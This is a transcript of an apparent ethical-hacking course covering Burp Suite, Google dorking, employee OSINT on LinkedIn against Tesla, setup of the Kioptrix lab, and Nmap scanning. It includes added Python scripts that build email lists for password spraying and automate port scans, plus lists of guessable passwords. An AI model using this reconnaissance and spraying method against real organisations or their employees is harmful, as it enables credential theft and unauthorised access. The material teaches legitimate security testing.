and then we're going to go ahead and just hit Import. Your Downloads folder should automatically be selected; if not, select Downloads and then just select the cacert.der, hit Open, and then, it's already installed for me, but you will have two checkboxes. Check both of those boxes and select OK, and then it should now be imported for you. So a couple of things to note: Firefox sometimes changes things around. I'm recording this video in 2019; if you watch it at a later time, just be cognizant that in the General tab, usually towards the bottom, is the Network Settings, and the Privacy and Security settings usually contain the certificates, so look around for those; sometimes these move. So from here let's go ahead and just see what we set up. So I want you to go ahead and try to go to a website; we can try to say tesla.com, and it is going to stall out. What is going on here? So if we go over here we see this Proxy tab is lit up in orange. We're going to go ahead and click on that, and you can see that it's gathering some data here. It's captured some stuff from Firefox, uh, we've got more Firefox, we can just click Forward through this if we want, and now we can see Tesla's starting to load. And what we're doing is we're intercepting requests that Tesla is making out. This to me looks like an API request or geoip request, so this might be geolocation looking for a city. So we're just clicking through, clicking through; all we're doing is capturing all different kinds of traffic, and we can modify this traffic. Say we have this request here; you don't have to know what this is right now, but we've got this GET request, we can make this a POST request and forward that and see what happens. I'm just going to turn the intercept off; I'm going to show you what's going on here. So we can go over to the Target, and you can see all the pages that have loaded in here; this is all the traffic that has been intercepted so far since we ran Tesla. So not only is Tesla running, but you can see that it pulls Google Analytics, it
pulls this Secured Visit, which looks like tracking as well, it pulls DoubleClick, which looks like maybe ads, and then it has an API running here as well. So it's gathering all this traffic through, but we're going to dig into this Tesla here, and I just want to click on the first forward slash and see if there's a response to our request. There isn't. Let's go ahead and just look at, maybe, let's see if we click into one of these, if we get a good response. We don't. Let's refresh one more time on the page, and you might even need to hit enter, okay, and sometimes it doesn't come through right away, so let's go ahead and just click around. There we go, do you see all the stuff coming through now? That's more like it; it wasn't picking everything up right away. So what we can do is we can look at some of the things that just came through, like we just went to the Model 3 page, so let's go ahead and click on this model3 and see what it's got for us. So you can see that if we look at the request for this GET model3, we made a GET request to model3, and what's happened is we say hey, I want to go out to this page, go ahead and take me there, and then we can view the response as well. Now in the response we can get so much information. Look at this: we're seeing here that PHP 7.3.7 is running on the back end, we can see a bunch of information here as well, like Drupal 8 is running; we identified that earlier, but we're identifying it again. We could see a lot of other stuff; there's weird things going on here too, like there's a server name sitting in here. Typically on an assessment this would actually be a finding, a low finding, but it's informational, as this is giving us information on possibly naming structure inside the network. But they also have their own Tesla-type header here, so this is very unique for a client. But what the point of the matter is here is that we can intercept a basic request and response and get a lot of information through Burp Suite. We're going to hit home on this really
hard when it comes into the scanning and enumeration section and when we get into the web section as well. But for now I just want you to take away that we've installed Burp Suite and we can go out to a website, and I still define this as not active scanning. There is a feature in Burp Suite that has active scanning that we could actually run, but that is Burp Suite Pro, so it has a vulnerability scanner built in; you can see up here, Upgrade to Burp Professional, automatically find vulnerabilities. I have Burp Suite Pro; it's 400 a year, it is absolutely fantastic, worth the money, one of the few applications that I would recommend anybody buy. But for the course I'm going to limit it to utilizing Community Edition. I will bring in Pro sometimes just to show you some features, but we're not going to worry about that. So long spiel short, I still feel that we are in step one here; even though we are accessing the website, we're not doing anything very actively with scanning. This is all very passive; we're using traffic like a normal user would. So you can see that we can intercept traffic and get a lot of information. Again, tools like Wappalyzer, look, it pulls down the headers for us and it says hey, it's running PHP 7.3.7, it's running Drupal 8.
Where is it getting that from? Well, it's getting it from these responses. So it's pulling a lot of that down for us automatically, but there's a lot of things that we can do when we get into Burp Suite as well, so consider this just a mini introduction to the tool, and then we'll touch back on it over and over again as we go. So this is it for this video; we're going to get into some Google-fu in the next video and talk about social media as well, so I'll see you in the next one. Okay, now on to what is going to be your absolute best friend in your entire life and in your career: Google. Google, everybody. I cannot stress how important it is to be good at googling, and you don't have to be amazing at it, but there are so many things that people approach me with that you can find on Google in a second, and if you've never seen the "let me google that for you," that's a lot of my life, uh, when it comes to the questions I get asked. And what makes a really good pen tester, or a really good anything, especially in IT, is the ability to google. So being able to look this stuff up on your own and be able to find your own resources and find solutions to your problems is going to make you a way better pen tester and just way better at your career with troubleshooting and everything else. So I'm done harping; I just wanted to stress how important I think Google is. So I'm going to show you today what's called a little bit of Google-fu. So I'm already out on the interwebs, I'm out to Google, and here we've got Google up, but I want to show you that I just searched for "google search syntax" and the first one, "Google search operators," came up. If you go look at this page, this is a really nice list of some things that you can run on Google, and it'll help you out. I'm going to show you just a few things that we can use to search for and how we can start narrowing down some results. So if we go to Google and we just type in something like tesla, that's going to bring up Tesla here, okay, we found the main
Tesla site, but we're going to get news articles and we're going to get all kinds of stuff, okay, we get the Twitter, and maybe we want this, maybe we do, but maybe we don't; maybe we don't want all this mess, maybe we only want items from Tesla. So we could just say something like site:tesla.com, which we've discovered here, and notice I'm not putting in the www, because that would limit us to that specific domain. So we have the www's in here, but you can see that it's starting to pull in something like shop and other items, right? So we can search for tesla.com, and maybe, maybe we don't want tesla.com www; maybe we take out, with the subtract here, maybe we just take out www, and we're going from 600, almost 700,000 results to 131,000 results, and you can see now we're pulling in ir, we're pulling in forums, and we're pulling in shop, and we're getting all these different unique subdomains. So I've showed you Sublist3r and I've showed you other ways to find subdomains, including theHarvester, but you can find subdomains like this as well. And let's say you only want to find things like, you know, ir; then we can just come in and we can say ir., or maybe you don't want www and you don't want ir, you can take those both out and you start finding more, like partners.tesla; shop again is coming up. So you can start finding different subdomains this way, pretty good. A couple of other things that we could look for: what about filetype? We could say filetype:, like this, and we could search for something like, I don't know, docx. Maybe there's a docx out there, and there's one docx, okay, it's a survey, probably not useful to us. Uh, maybe we can search for PDFs; with a company as big as Tesla it's probably going to be a lot to search through, but there are 3,300, almost 3,400 of these, so they've got different items here that we can look through. You know, maybe xlxs, Excel, right, actually that's xlsx, and you can see if there's any Excel, and csv. So what we're doing here, what's the point in me doing this? Well, the
point of me doing this is me looking for potentially sensitive files out there, or information. You would be surprised, a little bit of hunting on a domain... Now, granted, Tesla is a big company, big domain, and it's going to be hard to find some of this information, but you would be very surprised, with a little bit of prodding, a little bit of Google-fu, and narrowing down the type of results that you can get off of a company; I mean, we can find all kinds of interesting stuff. For example, just the other day I found a backup page of an entire website just by doing something like this: entire website, credentials, source code, everything, and just through a little bit of Google-fu. So again, Google is your absolute best friend. Before you ask anybody a question, no matter how complex, I challenge you to google it first; make sure you have done your research and then ask somebody. You know, it's just good to get in that habit, and this is what is going to make or break you, I believe, in your career. So please, please do not ignore the Google machine; it is out there to help you, and it will pay your salary, uh, over and over again. So that's it for this video. We've got one more video left in this series, or this subset; we're going to talk a little bit about social media and how we can target that. So I will catch you over in the next video. Okay, so you don't have to follow along in this video; I just kind of want you to start getting the wheels spinning and thinking about other items that we could be looking for when it comes to OSINT. Now we could look on a website like LinkedIn or like Twitter and find useful information. I was on this website for literally one minute; I've logged in, I went to Tesla, and I've already kind of found something, and I want to show you how fast this is. So you come in here and you go to Tesla the company, the company page here, and I love to click on images; there's always employee photos on images. Now you scroll down a little bit and you can see somebody
has recently posted a picture of their internship at Tesla, and what we can do is click on the picture and look for things like badge photos or desk pictures or anything of the sort. Now good employees are told to hide their badges from pictures, and you can see they've done a pretty good job, but if you look down here, right down here, it's hard to zoom in, but there is 100% a badge there. Is this a great picture? No, but this is a good example of an easy way to find a badge, utilizing social media, and you can find a lot of stuff very, very, very quickly. So another thing to point out too is that Twitter is a gold mine for these kinds of things. I have found badge pictures, desk pictures, software, all kinds of stuff via Twitter and via LinkedIn. Now from the non-physical perspective, or the information gathering perspective for what seems like physical assessments, the other thing to point out is that it's really good to find the people. Like, LinkedIn's great, so we can come in here, we can find members, right, and these are all going to say LinkedIn Member. I don't have... this account is just kind of my peeping account that I just utilize when I want to look and not trigger anything weird when I'm looking at a company, because if somebody sees me as a person looking at a company they might say, why is this guy looking at my profile? So you might not get names if you don't have the premium on some of these; you might see LinkedIn Member, but you can also dig some names, like here's a name, here's a name, here's a name. And you take those names and you remember the formatting from before, right? We had the formatting when we looked at hunter.io and we said okay, first initial, last name. Well, I might take a first initial, last name here and I'll add that to my list. Now we could utilize scrapers out there to look through the employee list and pull down all the names and then transfer those names into first initial, last name. You could write a script to do that with Python, if you want to challenge
yourself to do that. I guarantee you there are tools out there to do this, but this is the kind of information that we're after. We're after what kind of credentials can we gather, and this loops all back; this is the, the wheels spinning here, right? You want email addresses. When we're talking network, and we're talking what you're going to be doing with these kinds of assessments, you want these email addresses, you want anything that's been a part of a breach, current credential leak, right, and you just want as much information on the employees as you can gather. When you take all these email addresses, and it says something, it says 34,000 employees; when you take 34,000 employees, I would almost bet money on it that one of these employees has a password of something like Fall2019 or Winter2019! or something like Tesla1234!. People are always the weakest point of an organization, and people will be lazy with their passwords unless you absolutely force them to use long passwords. I do not know Tesla's password policy, but I get in on almost every external assessment with a weak password like Fall2019 or Winter2019.
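Editor's note, added example: the video suggests writing a Python script that turns scraped employee names into the email format discovered on hunter.io (first initial plus last name). The script below is that exercise worked through; it is not code from the video, and it also handles the cases a real scrape throws at you (anonymised "LinkedIn Member" rows, middle initials, credentials after a comma, generational suffixes, accented or hyphenated names, duplicates) and supports a few other common formats. The names are constructed samples of no real people, and example.com and the pattern table are assumptions for illustration, not any company's actual format.

```python
"""Added example, not the video's code: turn scraped employee names into
candidate email addresses once the company's format is known (the video's
example is first initial + last name, as seen on hunter.io). Names below
are constructed samples; the domain and patterns are assumptions."""
import re
import unicodedata

# Format patterns in the style hunter.io reports them. {f}=first initial,
# {first}=first name, {l}=last initial, {last}=last name.
PATTERNS = {
    "first_initial_last": "{f}{last}",
    "first.last": "{first}.{last}",
    "first_last": "{first}_{last}",
    "firstl": "{first}{l}",
}

SUFFIXES = {"jr", "sr", "ii", "iii", "iv", "phd", "md", "cpa"}
PLACEHOLDERS = {"linkedin member"}


def normalize_token(token):
    """Strip accents and punctuation, lowercase: "O'Brien-Smith" -> "obriensmith"."""
    ascii_only = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z]", "", ascii_only.lower())


def split_name(full_name):
    """Return (first, last) or None for names that cannot be used.

    Drops credentials after a comma ("Jane Doe, CPA"), generational
    suffixes, and middle names/initials, keeping the final token as the
    last name. Anonymised placeholders like "LinkedIn Member" and
    single-word names return None rather than a bad guess.
    """
    if full_name.strip().lower() in PLACEHOLDERS:
        return None
    base = full_name.split(",")[0]
    tokens = [normalize_token(t) for t in base.split()]
    tokens = [t for t in tokens if t and t not in SUFFIXES]
    if len(tokens) < 2:
        return None
    return tokens[0], tokens[-1]


def make_email(full_name, domain, pattern="first_initial_last"):
    """One candidate address for one name, or None if the name is unusable."""
    parts = split_name(full_name)
    if parts is None:
        return None
    first, last = parts
    local = PATTERNS[pattern].format(f=first[0], first=first, l=last[0], last=last)
    return f"{local}@{domain}"


def build_list(names, domain, pattern="first_initial_last"):
    """Deduplicated, sorted candidate list, ready to check against breach
    data or to feed a password spray with a seasonal password like Fall2019!."""
    out = set()
    for n in names:
        e = make_email(n, domain, pattern)
        if e:
            out.add(e)
    return sorted(out)


# Constructed sample of scraped names (not real people).
SCRAPED = [
    "Jane Doe",
    "LinkedIn Member",
    "John Q. Public",
    "Maria José Núñez, CPA",
    "Robert O'Brien-Smith Jr.",
    "Cher",
    "jane doe",
]

if __name__ == "__main__":
    for e in build_list(SCRAPED, "example.com"):
        print(e)
```

Pick the pattern key that matches what hunter.io reported for the target; when the format is unknown, running build_list once per pattern and comparing against a few addresses confirmed from breach data quickly tells you which one the company uses.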
So I want you to think about these things. We're not going to go too in depth into social media, but have that in your wheelhouse as well. We're just trying to utilize as many resources as are out there in order to use them to our advantage. So there's a lot of tools that I've shown you, and I've given you a lot of the basics, and really that's all you need for information gathering. Google is your best friend; utilize Google to your full advantage. Utilize social media; people post things all the time that they shouldn't be posting. And just dig deep; information gathering is one of the most important steps, along with scanning and enumeration. Keep repeating that to yourself and you'll be very, very successful as a penetration tester. So that is it for this section. I kind of just wanted to give a brief overview of this and then give you some ideas to get your wheels spinning and really think about it. Again, we're harping on breached credentials mainly. So from here we're gonna move into scanning and enumeration; we're gonna start doing our hacking, getting into the real weeds of hacking, and I'm very, very excited about that, and you're going to see some of the stuff that you've seen before when it comes to reconnaissance pop back up. So I'm excited to see this play out through the course and how we're going to utilize it. So that's it for this section; I look forward to seeing you in the scanning and enumeration section, so I will catch you over there. Welcome to the scanning and enumeration section of this course. It is actually now 2021 when we're recording this, and we're doing some light updating on how we go about starting off this lab in this section. So we're going to be using a vulnerable machine called Kioptrix. If you go to Google you can type in Kioptrix and find it fairly easily, so you go to Kioptrix, like this, K-I-O-P-T-R-I-X, and we're gonna be using Level 1. I'm showing you the source of where it's coming from, but we're actually going to provide this VM just to avoid any sort of
confusion. So Kioptrix Level 1 here comes from a website called VulnHub; let me make this a little bit bigger so you see. VulnHub is a great website and great resource once you kind of get into hacking and learning about this, where you can come to VulnHub and just download a vulnerable machine, run it on VMware or VirtualBox or however you want, and try to attack it. And you can see they have difficulty: easy, intermediate; you can come through here and just have fun playing with vulnerable machines, and that's all Kioptrix is. It's a beginner-level vulnerable machine that you can download, install and run. Now the download and the install, you can see this is from 2010; some of the stuff was broken, sometimes a little bit difficult to get running in the original lab, so we're just modifying this a bit to make it easier. What we've done on our end is just hosted a file that will work, that should by default install and run. So if you go to your browser and you just go to tcmsec.com, like this, and you type in /kioptrix, K-I-O-P-T-R-I-X, pause for a second, make sure you see this, and then you just hit enter, you'll be brought to a Google Drive, okay, and this Google Drive here should say Kioptrix. You should have an OVF and an OVA file; all you need here is the OVA, and all you'll have to do is just hit download right here, get the download going. I believe this is around 250 megabytes, so it might take a minute. Go ahead, download it, pause, and then come back when you're ready to continue. Okay, so moving on, I'm going to show you how to install this on VMware and on VirtualBox. These are the only two supported methods that we're going to utilize in the course. If you're going and you're using something like VMware Horizon, or you're using a different type of virtualization software, that's fine, but we can't support it if you run into any issues. So we strongly, strongly recommend using VMware; if you're using VirtualBox that's fine as well, but we're going to be doing
most of the course in VMware, though it should not matter too much. So here is VMware; I'm going to show you first how to install it here, and then we're going to go ahead and do the same thing in VirtualBox. So all we're going to do is we're going to go to Player up here, or we can go to Home actually, and we could just say Open a Virtual Machine, and then just go ahead and navigate to the area where you downloaded it. Okay, so here's my file, Kioptrix Level 1; I'm going to say Open, I'm going to go ahead and just save this here. So I'm going to say, this is where you want to save your storage path; I'm saving it here, call it Kioptrix Level 1, Import. The defaults are fine. You might get an error right here; that's okay too, just hit Retry and it should work fine. It's going to take a second to import; while we're waiting I'm going to go ahead and also do the same thing with VirtualBox. So I'm going to get VirtualBox going, and what we'll do here is a similar process, so we'll go to Import and then we'll just select the area for our file. Okay, and mine again is just sitting here on this drive, Kioptrix Level 1.ova. I'll hit Next, and then it's going to ask me some questions here; we're just going to hit Next on this, we'll go ahead and set these up in a second, so I'm just going to say Import and that'll be fine. All right, so looking at the settings for both of these machines, I'm going to go ahead and drag this over here; we can just right-click and go to Settings, same thing here, you can right-click and go to Settings, and we're going to set these up the same. So either way, on 512 megabytes, this is fine; honestly, if you wanted to kick this down to 256 you could. I would not recommend going any lower than 256 though. Oops, I did not mean to exit that, um, though I will say that if you have... I wouldn't go lower than 256.
we're just going to be running this in the background but you don't need to go higher either so 256 i think is fine if you want to give a 512 that's fine too depending on the amount of ram that you have on your actual machine so 256 is good and then here in the network adapter we're going to switch to nat okay so make sure you're good there and just hit okay and that should be it same thing here so if you want to switch the storage you can or the the amount of ram allocated you can only big thing here is just going into the network and you can see that it says nat network and that's exactly what we want okay so this box is set up just fine and then all you have to do on these is just hit play okay all you got to do is power it on you could just say start here and i could just hit play here and both will start all we're going to do is just let this run so that's all you want to do at this point you're just going to let it run you can see i've got both machines booting you will come to a login screen and that's when you know that this is ready okay so when you're at the login screen it'll say hey kiatrix blah blah blah and then we're going to take it from there and we're going to figure out how we can get into this machine okay so if you get a screen like this you can just say do nothing and just let this keep booting but other than that once this runs to a login we're going to go ahead and move on to the next video so you see this once you're at the login screen you are good to go all right and that is it so i will catch you over in the next video as we walk through how to find this machine and then we're going to start scanning it and tacking it and hopefully rooting it so i'll catch you over in the next video hello everybody and welcome to this section on nmap i'm actually recording this in 2020 so the video you're going to see here shortly is from 2019 we've had a little bit of issues with the command that i show which is net discover on how to find your ip 
address of the Kioptrix machine to actually begin scanning this machine. So I'm going to show you a couple of alternatives, and then I'm going to let the video play as it was before, and you'll have several options on how to find your Kioptrix machine and hopefully find the IP address.

So at this Kioptrix login page, we can cheat just a little bit. What I'm going to do is actually give you a login here. Just go ahead and type john as the login, and I'm going to show you the password before I delete it. The password is going to be TwoCows2, just like that, T-w-o-C-o-w-s-2, with the T and the C capitalized. So go ahead and type in john and then TwoCows2, and you can see we are now logged in as john at kioptrix. Now, this machine is very, very old, so the typical ifconfig or ip a or any of those do not work on this machine. However, we can do a quick ping, for example, to anything we want. We could say 8.8.8.8; it could be an internal IP address; it doesn't have to be an IP address that resolves. But we could say ping, and as we ping (I'm going to hit Ctrl+C here) you can see that we see "ping from 192.168.4.53." That's my IP address. Now, the IP address you're going to see here in the video shortly is going to change; however, as of right now, the IP address I'm seeing for Kioptrix is .4.53.

Now, we also use netdiscover, but there's actually a cool tool we can utilize as well. If we come into the network, you can see that I have an IP address of 192.168.4.51 for myself. Now there is a tool built into Kali Linux that is called arp-scan, and you can use a syntax of -l with that. Hit enter and it's going to pull off an ARP scan as well, which is what netdiscover is doing. What we need to be looking for (and you can see this is kind of my home network) is VMware. You can see VMware is sitting here at 192.168.4.53. The only one to be on the lookout for is possibly yourself, which we're at .51; I don't see that in this list, it didn't pick us up. So I could see 192.168.4.53 VMware should be the only one that's running, or if you're using VirtualBox or something like that, it should show up here. So kind of identify it either this way, or you can come in and identify it through the Kioptrix login itself, or of course you can use netdiscover as shown in the video. So without further ado, let's go ahead and go into the video on scanning with Nmap.

Okay, so now we have Kioptrix up and running. We need to determine where it actually is, and then we can do a little bit of scanning. So what we're going to do is go up into our applications and open our terminal. I'm just going to make this a little bit bigger, and we're going to run a tool called netdiscover. So before we can do that, we need to type in ifconfig and identify your IP address. I'm just going to copy the first three octets here, and we're going to run netdiscover. So netdiscover is going to look like this: we're going to say netdiscover, we're going to do a -r for range, we're going to paste in this and do a .0/24. So what are we doing? We are going to be using ARP to detect all the machines on the network. You should be familiar with ARP from the Linux lessons and from the networking lessons. So we're going to attempt to use ARP to address anything on the network, and we're sweeping the entire subnet of /24. So I'm going to go ahead and hit enter, and in a second here our machine should start popping up, and it does. So remember our host was at .139. This host here at .134 is likely our culprit. You should only have two machines in the network because we're only running two; you can ignore .1, .2, and .254. We are only focusing on the one that looks similar to ours, which is 192.168.57.134. So now we know our machine address, we can start attacking it. I'm going to go ahead and hit Ctrl+C, which is going to kill this session here, and I'm going to hit Ctrl+L to clear my screen. All right, so I'm going to open up a notepad and we'll just store this away for a rainy day. We need to first talk
about what we're going to be doing here. So remember before, when we ran our TCP three-way handshake, we had something like SYN, SYN-ACK, and ACK, right? And we can just say SYN-ACK, kind of like this, to combine it. So we've got three parts: we've got the part where we reach out to a port and we say, "hey port, are you open?" and the port says, "yeah, I'm open, let's go ahead and make that connection," and then we go ahead and connect to it. So what we're going to be doing is using a tool called Nmap, and Nmap stands for Network Mapper. Now what Network Mapper is going to go out and do is scan for open ports and services. This scanning is going to take place, and it's going to identify these open ports with something similar to this three-way handshake; we're just going to modify it a little bit. Now, the process that we're doing is called stealth scanning, and it used to be written out like this. Now it's just done by default, and we'll get to the switches here in a second, so don't worry about that. We're going to be running stealth scanning. Now, the stealth scanning used to be stealthy, right? That's why they called it stealth scanning, because it used to be undetectable. Nowadays it's very detectable. If you run Nmap in a network that has good security, you're going to get picked up, although, being a pen tester, I would say Nmap probably doesn't get picked up in 80% of the assessments that I run. So don't expect clients to be running good security, but just know that even though it says stealth, it's not stealthy at all.

So the stealth scanning: why was it stealthy, why was it called this? Well, if we go back to the three-way handshake, what the stealth scan does is it does the SYN. It says, "hey, I want to connect to you," and the open port, if it's open, will say, "yeah, I want to make that connection back with you, friend." And what's going to happen is we're just going to say, "you know what, I'm just kidding," and I'm going to send over this reset flag, so this RST. Why? Well, that means we don't actually establish a connection. So, like when you go out to a website and you go to Google and Google loads, well, guess what? You establish that connection; you establish that three-way handshake. What we're doing is we're going out and we're saying, "hey, I want to establish a connection." The port reveals to us that, "yes, I am open for connection," and then we're going to say, "just kidding, let's not make that connection." Because we never established that connection, it was technically stealthy. So that's what we're going out and doing: we're never making connections to these ports, but this is how we're identifying them as open.

So we're going to use a tool, and we're going to use it like this. We're going to say nmap, and we're going to say something along the lines of -T4 -p- -A. Now, you have no idea what this means, and I don't expect you to, but I'm going to walk you through these. What we're doing here is we're saying, "hey, Nmap, I have a choice in speed," and that choice in speed can be between a one and a five. One's really slow and five is really fast. Now, the default for me has always been four. I'm teaching you my preference; it's always been four, okay? We utilize this, and I think five is okay, but five is kind of fast; maybe you're going to miss something, maybe it gets caught. The slower the better in terms of detection, but in the instances that we're going to be running through this course we're going to use four. Any time you do something like a VulnHub or a Hack The Box, which you're going to see here in a few videos, you're going to run -T4 just because you're not worried about detection; you're not worried about anything. So -T4 is for speed purposes.

Now, -p-: this stands for "I want to scan all ports," okay? We could say something like -p, or we could just leave -p off completely. Now, if we leave off -p completely, it's going to scan what are known as the top 1000 ports. The top 1000 ports are your most common ports, so think of port 80, port 443, 139, 445, all the ports that we covered in the networking section; they're going to show up again here. But there are 65,535 ports out there, and we want to scan every single one of those, because what if, for example, there is a service running on port 47,700? Well, that's not a common top-1000 port. If we don't scan all ports, then we're going to miss that port, and that could be something incredibly valuable to us, right? So I always scan like this, -p-. You can also do things like scan specific ports; you could say -p 443, or, say you wanted to scan just for web servers, you could do -p 80,443, something like that. Or you could mix in, say you want to scan for DNS as well, you can add in 53, etc. You can scan for specifics, and we're going to get into that in a later video on why we might do it this way, but for now, for the beginner lesson, -p-, we're going to scan everything.

And lastly, we've got this -A in here. So -A stands for everything: I want to scan all of it. I want you to tell me the version information, the operating system information, anything you can tell me, fingerprinting, etc. Now, this may all be confusing; it's going to make a lot more sense when you see a scan. I'm going to go ahead and open up a new tab, and I'll blow this up for us, and what I want you to do is go ahead and start running the scan while we wait. So go ahead and copy this here, and the last thing we're going to do is put in our IP address, and that's how it knows what to scan. We're just going to hit enter on that, and now we're scanning. So from here, what we're going to do is take this, and I want to run nmap again with --help, and I want to talk through some of these settings in here so that you understand fully what we're doing. Now, --help is always great; as I said before, man pages are good as well. But let's talk about
some things here. So we've got this host discovery section, which we're really not going to use in this course, but this is good for, say, -sn. Say you want to do a ping sweep of the network. Well, you can do a ping scan, right, where you just sweep an entire subnet, a /24 for example, and see what's up, very quickly. -Pn: maybe the host isn't acting like it's online, but you know it's there for sure. You can say -Pn, and you say, "hey, I want to treat all the hosts as if they're online, even if they're not responding to my ping request or anything." So make yourself familiar with this kind of stuff. This is interesting, and we'll cover a lot of this as we go in the course, but just for the first walkthrough while we're scanning, I think this is super important.

Now, scan techniques. This -sS comes back into play. TCP SYN is what it's called, but it's also known as the stealth scan. There are all these other types of scans; you're not going to need them. There's only maybe one scan out of all these that may be useful, but you're not going to need them through this course, and you'll probably never use anything but the -sS and the -sU 99% of the time. So for the scope of this course, that's what we're going to focus on. Now, the -sS: we talked about connection-oriented protocols, we talked about TCP. Well, guess what? There's also UDP, and there are 65,535 ports over there as well that we have to scan. Now, UDP is a connectionless protocol, so when we scan it (let's go back to this scan), what we're going to do is actually put that -sU in here. I'll copy this syntax and just move it over so it looks a little cleaner. We could put it anywhere we want, the order doesn't matter, but we can say something like -sU to scan for UDP. And the one little change that I make here, two changes actually: I take off the -A, and I do a -p-, or I do a -p, I should say. Why do I do this? I do this because UDP takes forever to scan, absolutely forever to scan, because it is a connectionless protocol; it does not have that instant response time. So when we scan UDP, typically we scan the top 1000. That is my recommendation to you, or else you will be sitting here waiting for hours upon hours for a scan to finish. See, now our scan over here is already finished; if I were to run this UDP scan with the same thing, it would take forever.

Going back into this before we get into the scan, you can see here that we can specify -p for a port. That's going to be very common for us. But here's where I really want to get into: we're doing a -sV, a -sC, and a -O here, all with the -A, okay? So we're probing open ports for service information; we could say -sV, and we could say -sC, or we could pick one or the other, or a mixture of some of these. But we can also do script scanning, which we'll get into here in a little bit as well, and we can do OS detection, where it goes out and tries to determine an operating system. You're going to see all this with our scan, but when we use -A it does it all for us. So why not use -A? You can see it does OS detection, version detection, script scanning, and traceroute. Now, there's one caveat to -A, and we're going to talk about this in another video in a thought process: it is much faster to remove the -A and scan with -p-. Typically that'll come back much, much, much faster. Then what you can do is define the open ports. So say there's port 22 and port 80, okay? Just go through this. You can specify those ports specifically; you could say -p like we did in the example earlier with 80 and 443, and then do a -A on those. Now that will just scan only these specific ports with -A, instead of going out to every single port and attempting to do all of that on every single port. It's just a little bit faster.

Now, if your wheels are spinning and you're thinking about it, maybe you can even script this, right? You can script something to say, "hey Nmap, I want to take these ports from a basic scan, anything that you pull back, and I'm going to go ahead and run a new scan on it with the -A, only specifying the ports that we found." That gets your wheels spinning; this is where scripting becomes important if you want an improvement on speed. For me personally, I've never, ever done that. I don't think, for me personally, that it's made much of a difference. I just let my scans run as they run, and I work on other things while scans are running. There's plenty of time to do other things while you're doing your scanning. And typically, another thing to note is that we're doing scanning when we're doing our OSINT as well. So if we start up a client assessment, one of the first things I'm going to do is probably kick off a Nessus scan or an Nmap scan, and while I'm doing that, I'm going to go look for those breached credentials, or I'm going to look for that juicy information on Google or social media or wherever I can find it, and utilize that time while this is scanning; or else I'll just be sitting on my hands doing nothing while these wait.

So we're going to take this information now, and we're going to start reviewing it. We have here our scan results, and you can see the scan results come back, and the first thing we notice are open ports. That's what we want to look at: we want to look at these open ports, and we want to look at what's running on these open ports. So we see here that what's running on port 22 is SSH, okay? On top of that, it's got a version here for us, so OpenSSH 2.9p2, and then we see Apache is running on port 80.
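The two-pass idea mentioned a moment ago (a fast -p- sweep first, then -A only on the ports it found) as an added Python example. This is editor-supplied code, not part of the course or of Nmap: it parses Nmap's grepable (-oG) output, which is the format Nmap provides for exactly this kind of scripting, and builds the follow-up command. The sample output embedded below is constructed to match the ports the lesson finds on Kioptrix (plus one filtered port to show it gets dropped); the output file name pass1.gnmap and the helper names are my own.

```python
"""Two-pass Nmap workflow: full-port sweep first, then -A on only the open ports.

Added example, not from the course. It parses grepable (-oG) Nmap output.
"""
import re
from typing import Dict, List

# Constructed sample of `nmap -T4 -p- -oG - 192.168.57.134` output. Not a real
# scan; the open ports and service names mirror the ones the lesson finds.
# The filtered port 25 is there only to show that non-open entries are dropped.
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 192.168.57.134 ()\tStatus: Up
Host: 192.168.57.134 ()\tPorts: 22/open/tcp//ssh//OpenSSH 2.9p2/, \
25/filtered/tcp//smtp///, 80/open/tcp//http//Apache httpd 1.3.20/, \
111/open/tcp//rpcbind///, 139/open/tcp//netbios-ssn//Samba smbd/, \
443/open/tcp//ssl|https//Apache httpd 1.3.20/, 32768/open/tcp//status///\tIgnored State: closed (65528)
# Nmap done (constructed sample)
"""

# One "Host: ... Ports: ..." line per scanned host that had any ports to report.
HOST_LINE = re.compile(r"^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+(.*)$", re.MULTILINE)
# Each entry looks like port/state/proto/.../service/.../version/ ; keep only "open".
OPEN_PORT = re.compile(r"\b(\d{1,5})/open/(tcp|udp)/")


def parse_open_ports(grepable: str) -> Dict[str, Dict[str, List[int]]]:
    """Map each host to its open TCP and UDP ports from -oG output.

    Ports reported as filtered, closed or open|filtered are ignored: the second
    pass should only spend -A time on ports that actually answered.
    """
    hosts: Dict[str, Dict[str, List[int]]] = {}
    for host, ports_field in HOST_LINE.findall(grepable):
        ports_field = ports_field.split("\t", 1)[0]  # drop "Ignored State: ..."
        entry = hosts.setdefault(host, {"tcp": [], "udp": []})
        for port, proto in OPEN_PORT.findall(ports_field):
            entry[proto].append(int(port))
    for entry in hosts.values():
        for proto in entry:
            entry[proto] = sorted(set(entry[proto]))
    return hosts


def port_spec(ports: List[int]) -> str:
    """Render a port list as Nmap's -p argument, e.g. [22, 80] -> '22,80'."""
    if not ports:
        raise ValueError("no open ports to scan")
    return ",".join(str(p) for p in ports)


def first_pass_command(target: str, outfile: str = "pass1.gnmap", timing: str = "T4") -> str:
    """Sweep all 65,535 TCP ports with no -A, so it finishes quickly."""
    return f"nmap -{timing} -p- -oG {outfile} {target}"


def followup_command(target: str, tcp_ports: List[int], timing: str = "T4") -> str:
    """The lesson's -A scan, restricted to the ports the first pass found."""
    return f"nmap -{timing} -A -p{port_spec(tcp_ports)} {target}"


def udp_command(target: str, timing: str = "T4") -> str:
    """UDP is slow: default top-1000 ports and no -A, as the lesson recommends."""
    return f"nmap -{timing} -sU {target}"


def plan_from_grepable(grepable: str) -> Dict[str, str]:
    """Build the follow-up -A command for every host that had open TCP ports."""
    return {host: followup_command(host, ports["tcp"])
            for host, ports in parse_open_ports(grepable).items() if ports["tcp"]}


if __name__ == "__main__":
    target = "192.168.57.134"  # the lesson's Kioptrix address; yours will differ
    print("pass 1:", first_pass_command(target))
    # In real use you would run pass 1 and read pass1.gnmap; here we parse the sample.
    for host, cmd in plan_from_grepable(SAMPLE_GREPABLE).items():
        print("pass 2:", cmd)
    print("udp   :", udp_command(target))
```

Run the first command, feed the resulting pass1.gnmap to plan_from_grepable, and run what it prints; the -A pass then touches six ports instead of 65,535.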
